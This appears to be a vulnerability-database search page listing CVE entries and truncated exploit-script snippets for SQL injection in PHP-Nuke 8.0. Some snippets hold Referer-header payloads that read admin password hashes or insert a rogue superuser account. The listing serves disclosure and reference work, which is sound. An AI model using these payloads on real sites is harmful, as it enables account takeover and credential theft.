1732 matches found
CVE-2007-1061
SQL injection vulnerability in index.php in Francisco Burzi PHP-Nuke 8.0 Final and earlier, when the "HTTP Referers" block is enabled, allows remote attackers to execute arbitrary SQL commands via the HTTP Referer header HTTPREFERER variable...
CVE-2007-1061
SQL injection vulnerability in index.php in Francisco Burzi PHP-Nuke 8.0 Final and earlier, when the "HTTP Referers" block is enabled, allows remote attackers to execute arbitrary SQL commands via the HTTP Referer header HTTPREFERER variable...
CVE-2007-1061
CVE-2007-1061 involves a SQL injection in PHP-Nuke (index.php) for PHP-Nuke 8.0 Final and earlier when the HTTP Referers block is enabled. The vulnerability allows remote attackers to inject SQL via the HTTP_REFERER header (Referer). CVSS metrics from NVD indicate a base score of 6.8 (MEDIUM) wit...
Sql injection
SQL injection vulnerability in the category file in modules.php in the Emporium 2.3.0 and earlier module for PHP-Nuke allows remote attackers to execute arbitrary SQL commands via the categoryid parameter...
CVE-2007-1034
SQL injection vulnerability in the category file in modules.php in the Emporium 2.3.0 and earlier module for PHP-Nuke allows remote attackers to execute arbitrary SQL commands via the categoryid parameter...
CVE-2007-1034
SQL injection vulnerability in the category file in modules.php in the Emporium 2.3.0 and earlier module for PHP-Nuke allows remote attackers to execute arbitrary SQL commands via the categoryid parameter...
CVE-2007-1034
The CVE-2007-1034 entry describes an SQL injection vulnerability in the Emporium module (PHP-Nuke) affecting version 2.3.0 and earlier. The issue lies in the category_id parameter processed by modules.php, which allows remote attackers to execute arbitrary SQL commands. Observed impact is arbitra...
[Full-disclosure] Blind sql injection attack in INSERT syntax on PHP-nuke <=8.0 Final
Hello, it is my new advisory: Problem:Blind sql injection attack in INSERT syntax Product:PHP-nuke =8.0 Web page:http://phpnuke.org/ Credit:Maciej krasza Kukla @mail:[email protected] homepage:www.krasza.int.pl 1.Description ...PHP-Nuke 8.0 Final version. This version includes a new anti-flood...
PHP-Nuke 8.0 Final - HTTP Referers SQL Injection
!/usr/bin/perl 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; my $respone,$referer; banner; $referer="http://www.krasza.int.pl',NULL,SELECT pwd FROM nukeauthors WHERE radminsuper=1/"; $zadanie-referer$referer; $respone=$ua-request$zadanie; $respone-issuccess or die...
PHP-Nuke 8.0 Final - 'INSERT' Blind SQL Injection (MySQL)
!/usr/bin/perl 0day exploit for PHP-nuke = 4.0.24, using 'brute force' Coded by:Maciej krasza [email protected] Screenshot: 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; my...
PHP-Nuke 8.0 Final - 'INSERT' SQL Injection
!/usr/bin/perl 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; my $respone,$referer; banner; $referer="http://www.krasza.int.pl';INSERT INTO nukeauthors VALUES 'krasza', 'God', 'http://www.krasza.int.pl', '[email protected]', '61af1f6e572d7fe3a72f54a6ac53830e', '0', '1'...
NukeSentinel 2.5.05 - 'nsbypass.php' Blind SQL Injection
!/usr/bin/php URL: http://www.acid-root.new.fr/ ------------------------------------------------------------------ Usage: $argv0 -url -victim Opts Options: -isadmin Is the victim an Admin 1 or a normal user default=0 ? -prefix Table prefix default=nuke -tid If you have already used this sploit -b...
PHP-Nuke <= 8.0 Final (HTTP Referers) Remote SQL Injection Exploit
Exploit for unknown platform in category web applications ================================================================== PHP-Nuke new; my $zadanie = HTTP::Request-newGET = $adres; my $respone,$referer; banner; $referer="http://www.krasza.int.pl',NULL,SELECT pwd FROM nukeauthors WHERE...
PHP-Nuke <= 8.0 Final (INSERT) Blind SQL Injection Exploit (mysql)
Exploit for unknown platform in category web applications ================================================================== PHP-Nuke = 4.0.24, using 'brute force' Coded by:Maciej krasza Kuklaemail protected Screenshot: 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; m...
PHP-Nuke <= 8.0 Final (INSERT) Remote SQL Injection Exploit
Exploit for unknown platform in category web applications =========================================================== PHP-Nuke new; my $zadanie = HTTP::Request-newGET = $adres; my $respone,$referer; banner; $referer="http://www.krasza.int.pl';INSERT INTO nukeauthors VALUES 'krasza', 'God',...
phpnuke-sql.txt
exploit2.asp 'Update: + Get Header 'Update: + Get Whois Info '=============================================================================================== % function functionControl1 setTimeout"functionControl2",2000; function functionControl2 ifdocument.form1.field1.value=="" alert"Exploit...
PHP-Nuke <= 8.0 Final (INSERT) Blind SQL Injection Exploit (mysql)
No description provided by source. !/usr/bin/perl 0day exploit for PHP-nuke =8.0 Final Blind sql injection attack in INSERT syntax version for mysql = 4.0.24, using 'brute force' Coded by:Maciej krasza [email protected] Screenshot: 0day exploit for PHP-nuke =8.0 Final Sql injection attack in...
PHP-Nuke <= 8.0 Final (HTTP Referers) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl 0day exploit for PHP-nuke =8.0 Final Sql injection attack in INSERT syntax version, when 'HTTP Referers' block is on Coded by:Maciej krasza [email protected] Screenshot: 0day exploit for PHP-nuke =8.0 Final Sql injection attack in INSERT synta...
PHP-Nuke 8.0 Final - INSERT Blind SQL Injection (MySQL)
PHP-Nuke 8.0 Final - INSERT Blind SQL Injection MySQL !/usr/bin/perl 0day exploit for PHP-nuke = 4.0.24, using 'brute force' Coded by:Maciej krasza [email protected] Screenshot: 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; my...
PHP-Nuke 8.0 Final - HTTP Referers SQL Injection
PHP-Nuke 8.0 Final - HTTP Referers SQL Injection !/usr/bin/perl 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; my $respone,$referer; banner; $referer="http://www.krasza.int.pl',NULL,SELECT pwd FROM nukeauthors WHERE radminsuper=1/"; $zadanie-referer$referer;...